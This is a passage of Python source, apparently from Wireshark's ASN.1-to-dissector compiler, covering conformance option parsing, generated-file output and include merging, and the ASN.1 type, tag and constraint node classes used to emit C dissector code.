self.add_item(ctx, par[0], pars=par[1], fn=fn, lineno=lineno)
elif ctx in ('FN_HDR', 'FN_FTR', 'FN_BODY'):
result = cdirective.search(line)
if result: # directive
line = '#' + line[result.end():]
self.add_fn_line(name, ctx, line, fn=fn, lineno=lineno)
elif ctx == 'CLASS':
if empty.match(line): continue
par = get_par(line, 1, 3, fn=fn, lineno=lineno)
if not par: continue
if not set_type_to_class(name, par[0], par[1:]):
warnings.warn_explicit("Could not set type of class member %s.&%s to %s" % (name, par[0], par[1]),
UserWarning, fn, lineno)
elif ctx == 'TABLE':
self.report[name][-1]['text'] += line
def set_opt(self, opt, par, fn, lineno):
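        """Apply one '#.OPT' (or command-line style) conformance option.

        Illustrative examples: ('PER', []) selects PER encoding,
        ('-o', ['foo']) sets the output name, and ('-I', ['dir'])
        appends a directory to the conformance include search path.
        """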
#print "set_opt: %s, %s" % (opt, par)
if opt in ("-I",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.include_path.append(par[0])
elif opt in ("-b", "BER", "CER", "DER"):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.encoding = 'ber'
elif opt in ("PER",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.encoding = 'per'
elif opt in ("-p", "PROTO"):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.proto_opt = par[0]
self.ectx.merge_modules = True
elif opt in ("ALIGNED",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.aligned = True
elif opt in ("-u", "UNALIGNED"):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.aligned = False
elif opt in ("-d",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.dbgopt = par[0]
elif opt in ("-e",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.expcnf = True
elif opt in ("-S",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.merge_modules = True
elif opt in ("GROUP_BY_PROT",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.group_by_prot = True
elif opt in ("-o",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.outnm_opt = par[0]
elif opt in ("-O",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.output.outdir = par[0]
elif opt in ("-s",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.output.single_file = par[0]
elif opt in ("-k",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.output.keep = True
elif opt in ("-L",):
par = self.check_par(par, 0, 0, fn, lineno)
self.suppress_line = True
elif opt in ("EMBEDDED_PDV_CB",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.default_embedded_pdv_cb = par[0]
elif opt in ("EXTERNAL_TYPE_CB",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.default_external_type_cb = par[0]
elif opt in ("-r",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.remove_prefix = par[0]
else:
warnings.warn_explicit("Unknown option %s" % (opt),
UserWarning, fn, lineno)
def dbg_print(self):
print("\n# Conformance values")
print("%-15s %-4s %-15s %-20s %s" % ("File", "Line", "Table", "Key", "Value"))
print("-" * 100)
tbls = sorted(self.table.keys())
for t in tbls:
keys = sorted(self.table[t].keys())
for k in keys:
print("%-15s %4s %-15s %-20s %s" % (
self.table[t][k]['fn'], self.table[t][k]['lineno'], t, k, str(self.table[t][k][self.tblcfg[t]['val_nm']])))
def unused_report(self):
tbls = sorted(self.table.keys())
for t in tbls:
if not self.tblcfg[t]['chk_use']: continue
keys = sorted(self.table[t].keys())
for k in keys:
if not self.table[t][k]['used']:
warnings.warn_explicit("Unused %s for %s" % (t, k),
UserWarning, self.table[t][k]['fn'], self.table[t][k]['lineno'])
fnms = list(self.fn.keys())
fnms.sort()
for f in fnms:
keys = sorted(self.fn[f].keys())
for k in keys:
if not self.fn[f][k]: continue
if not self.fn[f][k]['used']:
warnings.warn_explicit("Unused %s for %s" % (k, f),
UserWarning, self.fn[f][k]['fn'], self.fn[f][k]['lineno'])
#--- EthOut -------------------------------------------------------------------
class EthOut:
def __init__(self):
self.ectx = None
self.outnm = None
self.outdir = '.'
self.single_file = None
self.created_files = {}
self.created_files_ord = []
self.keep = False
def outcomment(self, ln, comment=None):
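        """Wrap a line in a comment.

        Illustrative examples: outcomment('x') yields a fixed-width
        '/* x ... */' C comment line; outcomment('x', '#') yields '# x',
        as used for .cnf output.
        """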
if comment:
return '%s %s\n' % (comment, ln)
else:
return '/* %-74s */\n' % (ln)
def created_file_add(self, name, keep_anyway):
name = os.path.normcase(os.path.abspath(name))
if name not in self.created_files:
self.created_files_ord.append(name)
self.created_files[name] = keep_anyway
else:
self.created_files[name] = self.created_files[name] or keep_anyway
def created_file_exists(self, name):
name = os.path.normcase(os.path.abspath(name))
return name in self.created_files
#--- output_fname -------------------------------------------------------
def output_fname(self, ftype, ext='c'):
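        """Build an output file name from the protocol name.

        Illustrative examples, assuming self.outnm == 'foo':
        output_fname('fn') -> 'packet-foo-fn.c',
        output_fname('', ext='h') -> 'packet-foo.h',
        output_fname('', ext='cnf') -> 'foo.cnf'.
        """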
fn = ''
        if ext not in ('cnf',):
fn += 'packet-'
fn += self.outnm
if (ftype):
fn += '-' + ftype
fn += '.' + ext
return fn
#--- file_open -------------------------------------------------------
def file_open(self, ftype, ext='c'):
fn = self.output_fname(ftype, ext=ext)
if self.created_file_exists(fn):
fx = open(fn, 'a')
else:
fx = open(fn, 'w')
comment = None
if ext in ('cnf',):
comment = '#'
fx.write(self.fhdr(fn, comment = comment))
else:
if (not self.single_file and not self.created_file_exists(fn)):
fx.write(self.fhdr(fn))
if not self.ectx.merge_modules:
fx.write('\n')
mstr = "--- "
if self.ectx.groups():
mstr += "Module"
if (len(self.ectx.modules) > 1):
mstr += "s"
for (m, p) in self.ectx.modules:
mstr += " %s" % (m)
else:
mstr += "Module %s" % (self.ectx.Module())
mstr += " --- --- ---"
fx.write(self.outcomment(mstr, comment))
fx.write('\n')
return fx
#--- file_close -------------------------------------------------------
def file_close(self, fx, discard=False, keep_anyway=False):
fx.close()
if discard and not self.created_file_exists(fx.name):
os.unlink(fx.name)
else:
self.created_file_add(fx.name, keep_anyway)
#--- fhdr -------------------------------------------------------
def fhdr(self, fn, comment=None):
out = ''
out += self.outcomment('Do not modify this file. Changes will be overwritten.', comment)
out += self.outcomment('Generated automatically by the ASN.1 to Wireshark dissector compiler', comment)
out += self.outcomment(os.path.basename(fn), comment)
out += self.outcomment(' '.join(sys.argv), comment)
out += '\n'
# Make Windows path separator look like Unix path separator
out = out.replace('\\', '/')
# Change absolute paths and relative paths generated outside
# source directory to paths relative to asn1/<proto> subdir.
out = re.sub(r'(\s)[./]\S*(/tools/|/epan/)', r'\1../..\2', out)
out = re.sub(r'(\s)[./]\S*/asn1/\S*?([\s/])', r'\1.\2', out)
return out
#--- dbg_print -------------------------------------------------------
def dbg_print(self):
print("\n# Output files")
print("\n".join(self.created_files_ord))
print("\n")
#--- make_single_file -------------------------------------------------------
def make_single_file(self):
if (not self.single_file): return
in_nm = self.single_file + '.c'
out_nm = os.path.join(self.outdir, self.output_fname(''))
self.do_include(out_nm, in_nm)
in_nm = self.single_file + '.h'
if (os.path.exists(in_nm)):
out_nm = os.path.join(self.outdir, self.output_fname('', ext='h'))
self.do_include(out_nm, in_nm)
if (not self.keep):
for fn in self.created_files_ord:
if not self.created_files[fn]:
os.unlink(fn)
#--- do_include -------------------------------------------------------
def do_include(self, out_nm, in_nm):
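        """Merge generated fragments referenced from in_nm into out_nm.

        Each '#include' of a file created during this run is replaced
        inline by that file's contents, bracketed by
        '/*--- Included file: ... ---*/' markers and '#line' directives
        so that compiler diagnostics still point into the fragments.
        """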
def check_file(fn, fnlist):
fnfull = os.path.normcase(os.path.abspath(fn))
if (fnfull in fnlist and os.path.exists(fnfull)):
return os.path.normpath(fn)
return None
fin = open(in_nm, "r")
fout = open(out_nm, "w")
fout.write(self.fhdr(out_nm))
fout.write('/* Input file: ' + os.path.basename(in_nm) +' */\n')
fout.write('\n')
fout.write('#line %u "%s"\n' % (1, rel_dissector_path(in_nm)))
include = re.compile(r'^\s*#\s*include\s+[<"](?P<fname>[^>"]+)[>"]', re.IGNORECASE)
        cont_linenum = 0
        while (True):
            cont_linenum += 1
line = fin.readline()
if (line == ''): break
ifile = None
result = include.search(line)
#if (result): print os.path.normcase(os.path.abspath(result.group('fname')))
if (result):
ifile = check_file(os.path.join(os.path.split(in_nm)[0], result.group('fname')), self.created_files)
if (not ifile):
ifile = check_file(os.path.join(self.outdir, result.group('fname')), self.created_files)
if (not ifile):
ifile = check_file(result.group('fname'), self.created_files)
if (ifile):
fout.write('\n')
fout.write('/*--- Included file: ' + ifile + ' ---*/\n')
fout.write('#line %u "%s"\n' % (1, rel_dissector_path(ifile)))
finc = open(ifile, "r")
fout.write(finc.read())
fout.write('\n')
fout.write('/*--- End of included file: ' + ifile + ' ---*/\n')
fout.write('#line %u "%s"\n' % (cont_linenum+1, rel_dissector_path(in_nm)) )
finc.close()
else:
fout.write(line)
fout.close()
fin.close()
#--- Node ---------------------------------------------------------------------
class Node:
def __init__(self,*args, **kw):
if len (args) == 0:
self.type = self.__class__.__name__
else:
assert (len(args) == 1)
self.type = args[0]
self.__dict__.update (kw)
def str_child (self, key, child, depth):
indent = " " * (2 * depth)
keystr = indent + key + ": "
if key == 'type': # already processed in str_depth
return ""
if isinstance (child, Node): # ugh
return keystr + "\n" + child.str_depth (depth+1)
if isinstance(child, type ([])):
l = []
for x in child:
if isinstance (x, Node):
l.append (x.str_depth (depth+1))
else:
l.append (indent + " " + str(x) + "\n")
return keystr + "[\n" + ''.join(l) + indent + "]\n"
else:
return keystr + str (child) + "\n"
def str_depth (self, depth): # ugh
indent = " " * (2 * depth)
l = ["%s%s" % (indent, self.type)]
l.append ("".join ([self.str_child (k_v[0], k_v[1], depth + 1) for k_v in list(self.__dict__.items ())]))
return "\n".join (l)
def __repr__(self):
return "\n" + self.str_depth (0)
def to_python (self, ctx):
return self.str_depth (ctx.indent_lev)
def eth_reg(self, ident, ectx):
pass
def fld_obj_repr(self, ectx):
return "/* TO DO %s */" % (str(self))
#--- ValueAssignment -------------------------------------------------------------
class ValueAssignment (Node):
def __init__(self,*args, **kw) :
Node.__init__ (self,*args, **kw)
def eth_reg(self, ident, ectx):
if ectx.conform.omit_assignment('V', self.ident, ectx.Module()): return # Assignment to omit
ectx.eth_reg_vassign(self)
ectx.eth_reg_value(self.ident, self.typ, self.val)
#--- ObjectAssignment -------------------------------------------------------------
class ObjectAssignment (Node):
def __init__(self,*args, **kw) :
Node.__init__ (self,*args, **kw)
def __eq__(self, other):
if self.cls != other.cls:
return False
if len(self.val) != len(other.val):
return False
for f in (list(self.val.keys())):
if f not in other.val:
return False
if isinstance(self.val[f], Node) and isinstance(other.val[f], Node):
if not self.val[f].fld_obj_eq(other.val[f]):
return False
else:
if str(self.val[f]) != str(other.val[f]):
return False
return True
def eth_reg(self, ident, ectx):
def make_virtual_type(cls, field, prefix):
if isinstance(self.val, str): return
if field in self.val and not isinstance(self.val[field], Type_Ref):
vnm = prefix + '-' + self.ident
virtual_tr = Type_Ref(val = vnm)
t = self.val[field]
self.val[field] = virtual_tr
ectx.eth_reg_assign(vnm, t, virt=True)
ectx.eth_reg_type(vnm, t)
t.eth_reg_sub(vnm, ectx)
if field in self.val and ectx.conform.check_item('PDU', cls + '.' + field):
ectx.eth_reg_field(self.val[field].val, self.val[field].val, impl=self.val[field].HasImplicitTag(ectx), pdu=ectx.conform.use_item('PDU', cls + '.' + field))
return
# end of make_virtual_type()
if ectx.conform.omit_assignment('V', self.ident, ectx.Module()): return # Assignment to omit
self.module = ectx.Module()
ectx.eth_reg_oassign(self)
if (self.cls == 'TYPE-IDENTIFIER') or (self.cls == 'ABSTRACT-SYNTAX'):
make_virtual_type(self.cls, '&Type', 'TYPE')
if (self.cls == 'OPERATION'):
make_virtual_type(self.cls, '&ArgumentType', 'ARG')
make_virtual_type(self.cls, '&ResultType', 'RES')
if (self.cls == 'ERROR'):
make_virtual_type(self.cls, '&ParameterType', 'PAR')
#--- Type ---------------------------------------------------------------------
class Type (Node):
def __init__(self,*args, **kw) :
self.name = None
self.constr = None
self.tags = []
self.named_list = None
Node.__init__ (self,*args, **kw)
def IsNamed(self):
if self.name is None :
return False
else:
return True
def HasConstraint(self):
if self.constr is None :
return False
else :
return True
def HasSizeConstraint(self):
return self.HasConstraint() and self.constr.IsSize()
def HasValueConstraint(self):
return self.HasConstraint() and self.constr.IsValue()
def HasPermAlph(self):
return self.HasConstraint() and self.constr.IsPermAlph()
def HasContentsConstraint(self):
return self.HasConstraint() and self.constr.IsContents()
def HasOwnTag(self):
return len(self.tags) > 0
def HasImplicitTag(self, ectx):
return (self.HasOwnTag() and self.tags[0].IsImplicit(ectx))
def IndetermTag(self, ectx):
return False
def AddTag(self, tag):
self.tags[0:0] = [tag]
def GetTag(self, ectx):
#print "GetTag(%s)\n" % self.name;
if (self.HasOwnTag()):
return self.tags[0].GetTag(ectx)
else:
return self.GetTTag(ectx)
def GetTTag(self, ectx):
print("#Unhandled GetTTag() in %s" % (self.type))
print(self.str_depth(1))
return ('BER_CLASS_unknown', 'TAG_unknown')
def SetName(self, name):
self.name = name
def AddConstraint(self, constr):
if not self.HasConstraint():
self.constr = constr
else:
self.constr = Constraint(type = 'Intersection', subtype = [self.constr, constr])
def eth_tname(self):
return '#' + self.type + '_' + str(id(self))
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def eth_strings(self):
return 'NULL'
def eth_omit_field(self):
return False
def eth_need_tree(self):
return False
def eth_has_vals(self):
return False
def eth_has_enum(self, tname, ectx):
return self.eth_has_vals() and (ectx.eth_type[tname]['enum'] & EF_ENUM)
def eth_need_pdu(self, ectx):
return None
def eth_named_bits(self):
return None
def eth_reg_sub(self, ident, ectx):
pass
def get_components(self, ectx):
print("#Unhandled get_components() in %s" % (self.type))
print(self.str_depth(1))
return []
def sel_req(self, sel, ectx):
print("#Selection '%s' required for non-CHOICE type %s" % (sel, self.type))
print(self.str_depth(1))
def fld_obj_eq(self, other):
return isinstance(other, Type) and (self.eth_tname() == other.eth_tname())
def eth_reg(self, ident, ectx, tstrip=0, tagflag=False, selflag=False, idx='', parent=None):
#print "eth_reg(): %s, ident=%s, tstrip=%d, tagflag=%s, selflag=%s, parent=%s" %(self.type, ident, tstrip, str(tagflag), str(selflag), str(parent))
#print " ", self
if (ectx.NeedTags() and (len(self.tags) > tstrip)):
tagged_type = self
for i in range(len(self.tags)-1, tstrip-1, -1):
tagged_type = TaggedType(val=tagged_type, tstrip=i)
tagged_type.AddTag(self.tags[i])
if not tagflag: # 1st tagged level
if self.IsNamed() and not selflag:
tagged_type.SetName(self.name)
tagged_type.eth_reg(ident, ectx, tstrip=1, tagflag=tagflag, idx=idx, parent=parent)
return
nm = ''
if ident and self.IsNamed() and not tagflag and not selflag:
nm = ident + '/' + self.name
elif ident:
nm = ident
elif self.IsNamed():
nm = self.name
if not ident and ectx.conform.omit_assignment('T', nm, ectx.Module()): return # Assignment to omit
if not ident: # Assignment
ectx.eth_reg_assign(nm, self)
if self.type == 'Type_Ref' and not self.tr_need_own_fn(ectx):
ectx.eth_reg_type(nm, self)
virtual_tr = Type_Ref(val=ectx.conform.use_item('SET_TYPE', nm))
if (self.type == 'Type_Ref') or ectx.conform.check_item('SET_TYPE', nm):
if ident and (ectx.conform.check_item('TYPE_RENAME', nm) or ectx.conform.get_fn_presence(nm) or selflag):
if ectx.conform.check_item('SET_TYPE', nm):
ectx.eth_reg_type(nm, virtual_tr) # dummy Type Reference
else:
ectx.eth_reg_type(nm, self) # new type
trnm = nm
elif ectx.conform.check_item('SET_TYPE', nm):
trnm = ectx.conform.use_item('SET_TYPE', nm)
elif (self.type == 'Type_Ref') and self.tr_need_own_fn(ectx):
ectx.eth_reg_type(nm, self) # need own function, e.g. for constraints
trnm = nm
else:
trnm = self.val
else:
ectx.eth_reg_type(nm, self)
trnm = nm
if ectx.conform.check_item('VIRTUAL_ASSGN', nm):
vnm = ectx.conform.use_item('VIRTUAL_ASSGN', nm)
ectx.eth_reg_assign(vnm, self, virt=True)
ectx.eth_reg_type(vnm, self)
self.eth_reg_sub(vnm, ectx)
if parent and (ectx.type[parent]['val'].type == 'TaggedType'):
ectx.type[parent]['val'].eth_set_val_name(parent, trnm, ectx)
if ident and not tagflag and not self.eth_omit_field():
ectx.eth_reg_field(nm, trnm, idx=idx, parent=parent, impl=self.HasImplicitTag(ectx))
if ectx.conform.check_item('SET_TYPE', nm):
virtual_tr.eth_reg_sub(nm, ectx)
else:
self.eth_reg_sub(nm, ectx)
def eth_get_size_constr(self, ectx):
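        """Return (min, max, extensible) for a SIZE constraint.

        Unbounded ends map to 'NO_BOUND' and extensibility to the C
        literals 'TRUE'/'FALSE'; e.g. (illustrative) SIZE(1..8, ...)
        yields ('1', '8', 'TRUE').
        """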
(minv, maxv, ext) = ('MIN', 'MAX', False)
if self.HasSizeConstraint():
if self.constr.IsSize():
(minv, maxv, ext) = self.constr.GetSize(ectx)
if (self.constr.type == 'Intersection'):
if self.constr.subtype[0].IsSize():
(minv, maxv, ext) = self.constr.subtype[0].GetSize(ectx)
elif self.constr.subtype[1].IsSize():
(minv, maxv, ext) = self.constr.subtype[1].GetSize(ectx)
if minv == 'MIN': minv = 'NO_BOUND'
if maxv == 'MAX': maxv = 'NO_BOUND'
if (ext): ext = 'TRUE'
else: ext = 'FALSE'
return (minv, maxv, ext)
def eth_get_value_constr(self, ectx):
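        """Return (min, max, extensible) for a value constraint.

        Decimal bounds get a 'U' suffix and bounds that do not fit into
        32 bits are wrapped; e.g. (illustrative) (0..4294967296) yields
        ('0U', 'G_GUINT64_CONSTANT(4294967296)', 'FALSE').
        """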
(minv, maxv, ext) = ('MIN', 'MAX', False)
if self.HasValueConstraint():
(minv, maxv, ext) = self.constr.GetValue(ectx)
if minv == 'MIN': minv = 'NO_BOUND'
if maxv == 'MAX': maxv = 'NO_BOUND'
if str(minv).isdigit():
minv += 'U'
elif (str(minv)[0] == "-") and str(minv)[1:].isdigit():
if (int(minv) == -(2**31)):
minv = "G_MININT32"
elif (int(minv) < -(2**31)):
minv = "G_GINT64_CONSTANT(%s)" % (str(minv))
if str(maxv).isdigit():
if (int(maxv) >= 2**32):
maxv = "G_GUINT64_CONSTANT(%s)" % (str(maxv))
else:
maxv += 'U'
if (ext): ext = 'TRUE'
else: ext = 'FALSE'
return (minv, maxv, ext)
def eth_get_alphabet_constr(self, ectx):
(alph, alphlen) = ('NULL', '0')
if self.HasPermAlph():
alph = self.constr.GetPermAlph(ectx)
if not alph:
alph = 'NULL'
if (alph != 'NULL'):
if (((alph[0] + alph[-1]) == '""') and (not alph.count('"', 1, -1))):
alphlen = str(len(alph) - 2)
else:
alphlen = 'strlen(%s)' % (alph)
return (alph, alphlen)
def eth_type_vals(self, tname, ectx):
if self.eth_has_vals():
print("#Unhandled eth_type_vals('%s') in %s" % (tname, self.type))
print(self.str_depth(1))
return ''
def eth_type_enum(self, tname, ectx):
if self.eth_has_enum(tname, ectx):
print("#Unhandled eth_type_enum('%s') in %s" % (tname, self.type))
print(self.str_depth(1))
return ''
def eth_type_default_table(self, ectx, tname):
return ''
    def eth_type_default_body(self, ectx, tname):
print("#Unhandled eth_type_default_body() in %s" % (self.type))
print(self.str_depth(1))
return ''
def eth_type_default_pars(self, ectx, tname):
pars = {
'TNAME' : tname,
'ER' : ectx.encp(),
'FN_VARIANT' : '',
'TREE' : 'tree',
'TVB' : 'tvb',
'OFFSET' : 'offset',
'ACTX' : 'actx',
'HF_INDEX' : 'hf_index',
'VAL_PTR' : 'NULL',
'IMPLICIT_TAG' : 'implicit_tag',
}
if (ectx.eth_type[tname]['tree']):
pars['ETT_INDEX'] = ectx.eth_type[tname]['tree']
if (ectx.merge_modules):
pars['PROTOP'] = ''
else:
pars['PROTOP'] = ectx.eth_type[tname]['proto'] + '_'
return pars
def eth_type_fn(self, proto, tname, ectx):
body = self.eth_type_default_body(ectx, tname)
pars = self.eth_type_default_pars(ectx, tname)
if ectx.conform.check_item('FN_PARS', tname):
pars.update(ectx.conform.use_item('FN_PARS', tname))
elif ectx.conform.check_item('FN_PARS', ectx.eth_type[tname]['ref'][0]):
pars.update(ectx.conform.use_item('FN_PARS', ectx.eth_type[tname]['ref'][0]))
pars['DEFAULT_BODY'] = body
for i in range(4):
for k in list(pars.keys()):
try:
pars[k] = pars[k] % pars
except (ValueError,TypeError):
raise sys.exc_info()[0]("%s\n%s" % (str(pars), sys.exc_info()[1]))
out = '\n'
out += self.eth_type_default_table(ectx, tname) % pars
out += ectx.eth_type_fn_hdr(tname)
out += ectx.eth_type_fn_body(tname, body, pars=pars)
out += ectx.eth_type_fn_ftr(tname)
return out
#--- Value --------------------------------------------------------------------
class Value (Node):
def __init__(self,*args, **kw) :
self.name = None
Node.__init__ (self,*args, **kw)
def SetName(self, name) :
self.name = name
def to_str(self, ectx):
return str(self.val)
def get_dep(self):
return None
def fld_obj_repr(self, ectx):
return self.to_str(ectx)
#--- Value_Ref -----------------------------------------------------------------
class Value_Ref (Value):
def to_str(self, ectx):
return asn2c(self.val)
#--- ObjectClass ---------------------------------------------------------------------
class ObjectClass (Node):
def __init__(self,*args, **kw) :
self.name = None
Node.__init__ (self,*args, **kw)
def SetName(self, name):
self.name = name
add_class_ident(self.name)
def eth_reg(self, ident, ectx):
if ectx.conform.omit_assignment('C', self.name, ectx.Module()): return # Assignment to omit
ectx.eth_reg_objectclass(self.name, self)
#--- Class_Ref -----------------------------------------------------------------
class Class_Ref (ObjectClass):
pass
#--- ObjectClassDefn ---------------------------------------------------------------------
class ObjectClassDefn (ObjectClass):
def reg_types(self):
for fld in self.fields:
repr = fld.fld_repr()
set_type_to_class(self.name, repr[0], repr[1:])
#--- Tag ---------------------------------------------------------------
class Tag (Node):
def to_python (self, ctx):
return 'asn1.TYPE(%s,%s)' % (mk_tag_str (ctx, self.tag.cls,
self.tag_typ,
self.tag.num),
self.typ.to_python (ctx))
def IsImplicit(self, ectx):
return ((self.mode == 'IMPLICIT') or ((self.mode == 'default') and (ectx.tag_def != 'EXPLICIT')))
def GetTag(self, ectx):
tc = ''
if (self.cls == 'UNIVERSAL'): tc = 'BER_CLASS_UNI'
elif (self.cls == 'APPLICATION'): tc = 'BER_CLASS_APP'
elif (self.cls == 'CONTEXT'): tc = 'BER_CLASS_CON'
elif (self.cls == 'PRIVATE'): tc = 'BER_CLASS_PRI'
return (tc, self.num)
def eth_tname(self):
n = ''
if (self.cls == 'UNIVERSAL'): n = 'U'
elif (self.cls == 'APPLICATION'): n = 'A'
elif (self.cls == 'CONTEXT'): n = 'C'
elif (self.cls == 'PRIVATE'): n = 'P'
return n + str(self.num)
#--- Constraint ---------------------------------------------------------------
constr_cnt = 0
class Constraint (Node):
def to_python (self, ctx):
print("Ignoring constraint:", self.type)
return self.subtype.typ.to_python (ctx)
def __str__ (self):
return "Constraint: type=%s, subtype=%s" % (self.type, self.subtype)
def eth_tname(self):
return '#' + self.type + '_' + str(id(self))
def IsSize(self):
return (self.type == 'Size' and self.subtype.IsValue()) \
               or (self.type == 'Intersection' and (self.subtype[0].IsSize() or self.subtype[1].IsSize()))
def GetSize(self, ectx):
(minv, maxv, ext) = ('MIN', 'MAX', False)
if self.IsSize():
if self.type == 'Size':
(minv, maxv, ext) = self.subtype.GetValue(ectx)
elif self.type == 'Intersection':
if self.subtype[0].IsSize() and not self.subtype[1].IsSize():
(minv, maxv, ext) = self.subtype[0].GetSize(ectx)
elif not self.subtype[0].IsSize() and self.subtype[1].IsSize():
(minv, maxv, ext) = self.subtype[1].GetSize(ectx)
return (minv, maxv, ext)
def IsValue(self):
return self.type == 'SingleValue' \
or self.type == 'ValueRange' \
or (self.type == 'Intersection' and (self.subtype[0].IsValue() or self.subtype[1].IsValue())) \
or (self.type == 'Union' and (self.subtype[0].IsValue() and self.subtype[1].IsValue()))
def GetValue(self, ectx):
(minv, maxv, ext) = ('MIN', 'MAX', False)
if self.IsValue():
if self.type == 'SingleValue':
minv = ectx.value_get_eth(self.subtype)
maxv = ectx.value_get_eth(self.subtype)
ext = hasattr(self, 'ext') and self.ext
elif self.type == 'ValueRange':
minv = ectx.value_get_eth(self.subtype[0])
maxv = ectx.value_get_eth(self.subtype[1])
ext = hasattr(self, 'ext') and self.ext
elif self.type == 'Intersection':
if self.subtype[0].IsValue() and not self.subtype[1].IsValue():
(minv, maxv, ext) = self.subtype[0].GetValue(ectx)
elif not self.subtype[0].IsValue() and self.subtype[1].IsValue():
(minv, maxv, ext) = self.subtype[1].GetValue(ectx)
elif self.subtype[0].IsValue() and self.subtype[1].IsValue():
v0 = self.subtype[0].GetValue(ectx)
v1 = self.subtype[1].GetValue(ectx)
(minv, maxv, ext) = (ectx.value_max(v0[0],v1[0]), ectx.value_min(v0[1],v1[1]), v0[2] and v1[2])
elif self.type == 'Union':
if self.subtype[0].IsValue() and self.subtype[1].IsValue():
v0 = self.subtype[0].GetValue(ectx)
v1 = self.subtype[1].GetValue(ectx)
(minv, maxv, ext) = (ectx.value_min(v0[0],v1[0]), ectx.value_max(v0[1],v1[1]), v0[2] or v1[2])
return (minv, maxv, ext)
def IsAlphabet(self):
return self.type == 'SingleValue' \
or self.type == 'ValueRange' \
or (self.type == 'Intersection' and (self.subtype[0].IsAlphabet() or self.subtype[1].IsAlphabet())) \
or (self.type == 'Union' and (self.subtype[0].IsAlphabet() and self.subtype[1].IsAlphabet()))
def GetAlphabet(self, ectx):
alph = None
if self.IsAlphabet():
if self.type == 'SingleValue':
alph = ectx.value_get_eth(self.subtype)
elif self.type == 'ValueRange':
if ((len(self.subtype[0]) == 3) and ((self.subtype[0][0] + self.subtype[0][-1]) == '""') \
and (len(self.subtype[1]) == 3) and ((self.subtype[1][0] + self.subtype[1][-1]) == '""')):
alph = '"'
for c in range(ord(self.subtype[0][1]), ord(self.subtype[1][1]) + 1):
alph += chr(c)
alph += '"'
elif self.type == 'Union':
if self.subtype[0].IsAlphabet() and self.subtype[1].IsAlphabet():
a0 = self.subtype[0].GetAlphabet(ectx)
a1 = self.subtype[1].GetAlphabet(ectx)
if (((a0[0] + a0[-1]) == '""') and not a0.count('"', 1, -1) \
and ((a1[0] + a1[-1]) == '""') and not a1.count('"', 1, -1)):
alph = '"' + a0[1:-1] + a1[1:-1] + '"'
else:
alph = a0 + ' ' + a1
return alph
def IsPermAlph(self):
return self.type == 'From' and self.subtype.IsAlphabet() \
               or (self.type == 'Intersection' and (self.subtype[0].IsPermAlph() or self.subtype[1].IsPermAlph()))
def GetPermAlph(self, ectx):
alph = None
if self.IsPermAlph():
if self.type == 'From':
alph = self.subtype.GetAlphabet(ectx)
elif self.type == 'Intersection':
if self.subtype[0].IsPermAlph() and not self.subtype[1].IsPermAlph():
alph = self.subtype[0].GetPermAlph(ectx)
elif not self.subtype[0].IsPermAlph() and self.subtype[1].IsPermAlph():
alph = self.subtype[1].GetPermAlph(ectx)
return alph
def IsContents(self):
return self.type == 'Contents' \
               or (self.type == 'Intersection' and (self.subtype[0].IsContents() or self.subtype[1].IsContents()))
def GetContents(self, ectx):
contents = None
if self.IsContents():
if self.type == 'Contents':
if self.subtype.type == 'Type_Ref':
contents = self.subtype.val
elif self.type == 'Intersection':
if self.subtype[0].IsContents() and not self.subtype[1].IsContents():
contents = self.subtype[0].GetContents(ectx)
elif not self.subtype[0].IsContents() and self.subtype[1].IsContents():
contents = self.subtype[1].GetContents(ectx)
return contents
def IsNegativ(self):
def is_neg(sval):
return isinstance(sval, str) and (sval[0] == '-')
if self.type == 'SingleValue':
return is_neg(self.subtype)
elif self.type == 'ValueRange':
if self.subtype[0] == 'MIN': return True
return is_neg(self.subtype[0])
return False
def eth_constrname(self):
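        """Derive a C-friendly name component for this constraint.

        Illustrative examples: SingleValue 10 -> '10', SingleValue -5 ->
        'M5', ValueRange 1..32 -> '1_32' (with a trailing '_' when
        extensible), SIZE(1..32) -> 'SIZE_1_32'; anything else gets a
        CONSTRnnn serial number.
        """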
def int2str(val):
if isinstance(val, Value_Ref):
return asn2c(val.val)
try:
if (int(val) < 0):
return 'M' + str(-int(val))
else:
return str(int(val))
except (ValueError, TypeError):
return asn2c(str(val))
ext = ''
if hasattr(self, 'ext') and self.ext:
ext = '_'
if self.type == 'SingleValue':
return int2str(self.subtype) + ext
elif self.type == 'ValueRange':
return int2str(self.subtype[0]) + '_' + int2str(self.subtype[1]) + ext
elif self.type == 'Size':
return 'SIZE_' + self.subtype.eth_constrname() + ext
else:
if (not hasattr(self, 'constr_num')):
global constr_cnt
constr_cnt += 1
self.constr_num = constr_cnt
return 'CONSTR%03d%s' % (self.constr_num, ext)
def Needs64b(self, ectx):
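        """Return True when the value range does not fit into 32 bits.

        Illustrative example: a (0..4294967296) constraint spans 2**32
        values and therefore needs the 64-bit dissection variants.
        """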
(minv, maxv, ext) = self.GetValue(ectx)
if (str(minv).isdigit() or ((str(minv)[0] == "-") and str(minv)[1:].isdigit())) \
and str(maxv).isdigit() and (abs(int(maxv) - int(minv)) >= 2**32):
return True
return False
class Module (Node):
def to_python (self, ctx):
ctx.tag_def = self.tag_def.dfl_tag
return """#%s
%s""" % (self.ident, self.body.to_python (ctx))
def get_name(self):
return self.ident.val
def get_proto(self, ectx):
if (ectx.proto):
prot = ectx.proto
else:
prot = ectx.conform.use_item('MODULE', self.get_name(), val_dflt=self.get_name())
return prot
def to_eth(self, ectx):
ectx.tags_def = 'EXPLICIT' # default = explicit
ectx.proto = self.get_proto(ectx)
